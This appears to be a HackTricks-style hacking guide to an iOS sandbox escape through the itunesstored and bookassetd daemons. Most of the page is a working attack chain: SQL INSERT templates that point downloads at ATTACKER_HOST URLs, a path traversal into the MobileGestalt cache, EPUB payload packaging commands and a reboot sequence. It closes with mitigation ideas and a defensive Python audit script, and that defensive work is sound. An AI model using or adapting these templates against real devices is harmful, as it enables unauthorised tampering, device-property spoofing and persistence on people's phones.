itunesstored & bookassetd Sandbox Escape

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Overview

Recent research shows that two daemons pre-installed on iOS, itunesstored (the download manager) and bookassetd (the Books / iBooks asset manager), blindly trust user-writable SQLite metadata. By dropping crafted downloads.28.sqlitedb and BLDatabaseManager.sqlite files together with a small EPUB archive, an attacker who can write to /var/mobile/Media/ can force these daemons to perform file writes to many mobile-owned paths under /private/var/. These primitives survive a reboot and let you modify system-group caches such as systemgroup.com.apple.mobilegestaltcache to spoof device properties or persist configuration changes.

Key properties:

  • Works on devices up to at least iOS 26.2b1 (tested on iPhone 12 / iOS 26.0.1).
  • Writable targets include the SystemGroup caches, /private/var/mobile/Library/FairPlay, /private/var/mobile/Media, and other mobile-owned files. Writes to root-owned files fail.
  • Requires only AFC-level access (copying files over USB) or any foothold that lets you replace the target SQLite DBs and host the payloads.

Threat Model & Requirements

  1. Local filesystem access to /var/mobile/Media/Downloads/ and /var/mobile/Media/Books/ (via AFC clients such as 3uTools, i4.cn, or afcclient over USB, or a prior compromise).
  2. An HTTP server serving the attacker files (BLDatabaseManager.sqlite, iTunesMetadata.plist, the crafted EPUB), exposed through URLs such as https://ATTACKER_HOST/fileprovider.php?type=....
  3. The ability to reboot the device several times so that each daemon restarts and re-ingests its database.
  4. Knowledge of the Books system-group UUID so that the Stage 1 write lands in the correct container (obtained via syslog).

Stage 1 – Abusing downloads.28.sqlitedb via itunesstored

itunesstored processes /var/mobile/Media/Downloads/downloads.28.sqlitedb. The asset table holds the URL plus destination metadata and is treated as trusted input. Crafting a row that references an attacker URL and sets local_path to .../Documents/BLDatabaseManager/BLDatabaseManager.sqlite inside the Books SystemGroup makes itunesstored download and overwrite the Books database with attacker content at boot.

Obtain the Books SystemGroup UUID

  1. Collect a syslog archive with pymobiledevice3:

```bash
pymobiledevice3 syslog collect logs.logarchive
```

  2. Open logs.logarchive in Console.app and search for bookassetd [Database]: Store is at file:///private/var/containers/Shared/SystemGroup/<UUID>/Documents/BLDatabaseManager/BLDatabaseManager.sqlite.
  3. Note <UUID> and substitute it into the SQL payload.

Malicious asset row

Stage 1 INSERT template (replace <UUID> with the Books SystemGroup UUID found above):

```sql
INSERT INTO "main"."asset" (
  "pid","download_id","asset_order","asset_type","bytes_total",
  "url","local_path","destination_url","path_extension","retry_count",
  "http_method","initial_odr_size","is_discretionary","is_downloaded",
  "is_drm_free","is_external","is_hls","is_local_cache_server",
  "is_zip_streamable","processing_types","video_dimensions",
  "timeout_interval","store_flavor","download_token","blocked_reason",
  "avfoundation_blocked","service_type","protection_type",
  "store_download_key","etag","bytes_to_hash","hash_type","server_guid",
  "file_protection","variant_id","hash_array","http_headers",
  "request_parameters","body_data","body_data_file_path","sinfs_data",
  "dpinfo_data","uncompressed_size","url_session_task_id"
) VALUES (
  1234567890,6936249076851270150,0,'media',NULL,
  'https://ATTACKER_HOST/fileprovider.php?type=sqlite',
  '/private/var/containers/Shared/SystemGroup/<UUID>/Documents/BLDatabaseManager/BLDatabaseManager.sqlite',
  NULL,'epub',6,'GET',NULL,0,0,0,1,0,0,0,0,
  NULL,60,NULL,466440000,0,0,0,0,'',NULL,NULL,0,
  NULL,NULL,NULL,X'62706c6973743030a1015f1020...',NULL,NULL,NULL,NULL,NULL,NULL,0,1
);
```

Key fields:

  • url: attacker-controlled endpoint returning the malicious BLDatabaseManager.sqlite.
  • local_path: the Books system-group BLDatabaseManager.sqlite file identified above.
  • Control flags: keep the defaults (asset_type='media', path_extension='epub', booleans set to 0/1 as in the template) so the daemon accepts the job.

Execution

  1. Delete any old contents of /var/mobile/Media/Downloads/* to avoid races.
  2. Replace downloads.28.sqlitedb with the crafted DB via AFC.
  3. Reboot → itunesstored downloads the Stage 2 database and drops /var/mobile/Media/iTunes_Control/iTunes/iTunesMetadata.plist.
  4. Copy that plist to /var/mobile/Media/Books/iTunesMetadata.plist; Stage 2 expects it there.

Stage 2 – Abusing BLDatabaseManager.sqlite via bookassetd

bookassetd has broader filesystem entitlements and trusts the ZBLDOWNLOADINFO table. By inserting a fake purchase row that references attacker URLs and a traversal in ZPLISTPATH, the daemon downloads your EPUB to /var/mobile/Media/Books/asset.epub and later unpacks its metadata into any reachable mobile-owned path via ../../... escape segments.

Malicious ZBLDOWNLOADINFO row

Stage 2 INSERT template:

```sql
INSERT INTO "ZBLDOWNLOADINFO" (
  "Z_PK","Z_ENT","Z_OPT","ZACCOUNTIDENTIFIER","ZCLEANUPPENDING",
  "ZFAMILYACCOUNTIDENTIFIER","ZISAUTOMATICDOWNLOAD","ZISLOCALCACHESERVER",
  "ZISPURCHASE","ZISRESTORE","ZISSAMPLE","ZISZIPSTREAMABLE",
  "ZNUMBEROFBYTESTOHASH","ZPERSISTENTIDENTIFIER","ZPUBLICATIONVERSION",
  "ZSERVERNUMBEROFBYTESTOHASH","ZSIZE","ZSTATE","ZSTOREIDENTIFIER",
  "ZSTOREPLAYLISTIDENTIFIER","ZLASTSTATECHANGETIME","ZPURCHASEDATE",
  "ZSTARTTIME","ZARTISTNAME","ZARTWORKPATH","ZASSETPATH",
  "ZBUYPARAMETERS","ZCANCELDOWNLOADURL","ZCLIENTIDENTIFIER",
  "ZCOLLECTIONARTISTNAME","ZCOLLECTIONTITLE","ZDOWNLOADID",
  "ZDOWNLOADKEY","ZENCRYPTIONKEY","ZEPUBRIGHTSPATH","ZFILEEXTENSION",
  "ZGENRE","ZHASHTYPE","ZKIND","ZMD5HASHSTRINGS","ZORIGINALURL",
  "ZPERMLINK","ZPLISTPATH","ZSALT","ZSUBTITLE","ZTHUMBNAILIMAGEURL",
  "ZTITLE","ZTRANSACTIONIDENTIFIER","ZURL","ZRACGUID","ZDPINFO",
  "ZSINFDATA","ZFILEATTRIBUTES"
) VALUES (
  1,2,3,0,0,0,0,'',NULL,NULL,NULL,NULL,
  0,0,0,NULL,4648,2,'765107108',NULL,
  767991550.119197,NULL,767991353.245275,NULL,NULL,
  '/private/var/mobile/Media/Books/asset.epub',
  'productType=PUB&salableAdamId=765107106&...',
  'https://p19-buy.itunes.apple.com/...',
  '4GG2695MJK.com.apple.iBooks','Sebastian Saenz','Cartas de Amor a la Luna',
  '../../../../../../private/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library',
  NULL,NULL,NULL,NULL,'Contemporary Romance',NULL,'ebook',NULL,NULL,NULL,
  '/private/var/mobile/Media/Books/iTunesMetadata.plist',NULL,
  'Cartas de Amor a la Luna','https://ATTACKER_HOST/fileprovider.php?type=gestalt',
  'Cartas de Amor a la Luna','J19N_PUB_190099164604738',
  'https://ATTACKER_HOST/fileprovider.php?type=gestalt2',NULL,NULL,NULL,NULL
);
```

Important fields:

  • ZASSETPATH: attacker-controlled on-disk location of the EPUB.
  • ZURL/ZPERMLINK: attacker URLs hosting the EPUB and the additional plist.
  • ZPLISTPATH: ../../../../../private/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library – the path-traversal base prepended to files extracted from the EPUB. Adjust the traversal depth to reach the SystemGroup you want.
  • Purchase metadata (ZSTOREIDENTIFIER, names, timestamps) mimics a legitimate record so the daemon does not discard the row.

After copying the malicious DB into /private/var/containers/Shared/SystemGroup/<UUID>/Documents/BLDatabaseManager/BLDatabaseManager.sqlite (with the help of Stage 1) and rebooting twice, bookassetd will (1) download the EPUB and (2) process it, writing the resulting plist under the traversed path.

Building the EPUB Payload

bookassetd honours the EPUB ZIP layout: mimetype must be the first, uncompressed entry. To map the EPUB contents onto the MobileGestalt cache, build a directory tree that mirrors the desired path relative to ZPLISTPATH.

```
Caches/
├── mimetype
└── com.apple.MobileGestalt.plist
```

Create the archive:

```bash
zip -X0 hax.epub Caches/mimetype
zip -Xr9D hax.epub Caches/com.apple.MobileGestalt.plist
```

  • mimetype normally contains the string application/epub+zip.
  • Caches/com.apple.MobileGestalt.plist holds the attacker-controlled payload that will land at .../Library/Caches/com.apple.MobileGestalt.plist.

Execution Flow

  1. Prepare the files on the attacker HTTP server and generate both SQLite DBs with the host- and UUID-specific values.
  2. Replace downloads.28.sqlitedb on the device and reboot → Stage 1 downloads the malicious BLDatabaseManager.sqlite and drops /var/mobile/Media/iTunes_Control/iTunes/iTunesMetadata.plist.
  3. Copy iTunesMetadata.plist to /var/mobile/Media/Books/iTunesMetadata.plist (repeat if the daemon deletes it).
  4. Reboot again → bookassetd downloads asset.epub into /var/mobile/Media/Books/ using the Stage 2 metadata.
  5. Reboot a third time → bookassetd processes the downloaded asset, follows ZPLISTPATH, and writes the EPUB contents to the targeted SystemGroup path (e.g. com.apple.MobileGestalt.plist).
  6. Verify by reading the modified plist or by observing that MobileGestalt-derived properties (model identifier, activation flags, etc.) have changed accordingly.

The same framework lets you place files in other mobile-owned caches, such as FairPlay state or persistence directories, enabling silent tampering without a kernel exploit.

Tools & Operational Notes

  • pymobiledevice3 syslog collect logs.logarchive – grab log archives to discover the Books SystemGroup UUID.
  • Console.app – filter for bookassetd [Database]: Store is at ... to get the full container path.
  • AFC clients (afcclient, 3uTools, i4.cn) – push/pull SQLite DBs and plist files over USB without a jailbreak.
  • zip – enforce the EPUB ordering constraints when packaging payloads.
  • Public PoC: https://github.com/hanakim3945/bl_sbx contains the baseline SQLite/EPUB templates you can adapt.

Detection and Mitigation Ideas

  • Treat downloads.28.sqlitedb and BLDatabaseManager.sqlite as untrusted input: verify that local_path / ZPLISTPATH stay inside the approved sandboxes and reject values that are absolute paths or contain traversal tokens.
  • Monitor for AFC writes that modify these databases, and for unexpected downloads initiated by itunesstored / bookassetd right after boot.
  • Harden bookassetd's unpacking by calling realpath() on the output target and ensuring it cannot escape the Books container before writing any file.
  • Restrict AFC / USB file-copy paths, or require user interaction before allowing Books/iTunes metadata files to be replaced.
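As an added example (this is not code from the page or from the bl_sbx PoC), the following Python audit applies the first and third bullets above to the two SQLite tables and to the EPUB layout described in the payload section: it flags asset rows whose local_path leaves the Downloads directory, ZBLDOWNLOADINFO rows whose ZPLISTPATH is absolute, contains a ".." segment, or resolves outside the Books directory, and EPUB archives whose first entry is not a stored root-level mimetype or whose member names could escape the extraction directory. It assumes only the column names that appear on the page (pid/url/local_path and Z_PK/ZURL/ZPLISTPATH), that bookassetd joins ZPLISTPATH onto /private/var/mobile/Media/Books before use (an assumption), and uses a placeholder UUID and constructed sample rows.

```python
import io
import posixpath
import sqlite3
import zipfile

# Roots each daemon may legitimately write under (paths named on the page).
# BOOKS_UUID is a placeholder for the Books SystemGroup container UUID.
BOOKS_UUID = "<UUID>"
DOWNLOADS_ROOT = "/private/var/mobile/Media/Downloads"
BOOKS_ROOT = "/private/var/mobile/Media/Books"


def resolves_inside(candidate, root, base=None):
    """Lexically resolve `candidate` (absolute, or relative to `base`) and
    report whether it stays under `root`. '.' and '..' segments are collapsed
    the way the filesystem would collapse them; nothing on disk is touched."""
    if not posixpath.isabs(candidate):
        if base is None:
            return False
        candidate = posixpath.join(base, candidate)
    norm = posixpath.normpath(candidate)
    root = posixpath.normpath(root)
    return norm == root or norm.startswith(root + "/")


def audit_asset_rows(conn):
    """itunesstored side: every asset.local_path must resolve under Downloads."""
    findings = []
    for pid, url, local_path in conn.execute("SELECT pid, url, local_path FROM asset"):
        if local_path and not resolves_inside(local_path, DOWNLOADS_ROOT):
            findings.append({"pid": pid, "url": url, "path": local_path})
    return findings


def audit_download_info_rows(conn):
    """bookassetd side: ZPLISTPATH is assumed to be joined onto the Books
    directory, so it must be relative, free of '..' segments, and stay there."""
    findings = []
    for pk, url, plist_path in conn.execute(
            "SELECT Z_PK, ZURL, ZPLISTPATH FROM ZBLDOWNLOADINFO"):
        if plist_path is None:
            continue
        bad = (posixpath.isabs(plist_path)
               or ".." in plist_path.split("/")
               or not resolves_inside(plist_path, BOOKS_ROOT, base=BOOKS_ROOT))
        if bad:
            findings.append({"pk": pk, "url": url, "path": plist_path})
    return findings


def audit_epub(data):
    """Structural checks a hardened unpacker should run before extracting:
    the first entry must be a stored (uncompressed) root-level 'mimetype',
    and no member name may be absolute or contain a '..' segment."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        if (not infos or infos[0].filename != "mimetype"
                or infos[0].compress_type != zipfile.ZIP_STORED):
            problems.append("first entry is not a stored root-level mimetype")
        for info in infos:
            if info.filename.startswith("/") or ".." in info.filename.split("/"):
                problems.append("unsafe member name: " + info.filename)
    return problems


def build_sample_db():
    """Constructed in-memory DB holding only the columns the audit reads (the
    real schemas are far wider). Row 1 of each table is benign; row 2 mirrors
    the traversal pattern shown on the page."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE asset (pid INTEGER, url TEXT, local_path TEXT);
        CREATE TABLE ZBLDOWNLOADINFO (Z_PK INTEGER, ZURL TEXT, ZPLISTPATH TEXT);
    """)
    conn.executemany("INSERT INTO asset VALUES (?, ?, ?)", [
        (1, "https://example.invalid/ok.epub", DOWNLOADS_ROOT + "/1/ok.epub"),
        (2, "https://ATTACKER_HOST/fileprovider.php?type=sqlite",
         "/private/var/containers/Shared/SystemGroup/" + BOOKS_UUID
         + "/Documents/BLDatabaseManager/BLDatabaseManager.sqlite"),
    ])
    conn.executemany("INSERT INTO ZBLDOWNLOADINFO VALUES (?, ?, ?)", [
        (1, "https://example.invalid/ok.epub", "iTunesMetadata.plist"),
        (2, "https://ATTACKER_HOST/fileprovider.php?type=gestalt",
         "../../../../../../private/var/containers/Shared/SystemGroup/"
         "systemgroup.com.apple.mobilegestaltcache/Library"),
    ])
    return conn


def build_sample_epub(safe=True):
    """Constructed EPUB bytes: a well-formed archive, or one whose member escapes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/epub+zip", compress_type=zipfile.ZIP_STORED)
        name = "OEBPS/content.opf" if safe else "../../Library/Caches/com.apple.MobileGestalt.plist"
        zf.writestr(name, "<plist/>", compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


if __name__ == "__main__":
    db = build_sample_db()
    print(audit_asset_rows(db))
    print(audit_download_info_rows(db))
    print(audit_epub(build_sample_epub(safe=False)))
```

The checks are purely lexical so they can run over a copied database or archive on an analyst's machine; inside the daemon itself the same rules should be applied after realpath() on the final output path, as the third bullet above describes, so that symlinks inside the Books directory cannot undo the normalisation.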

References
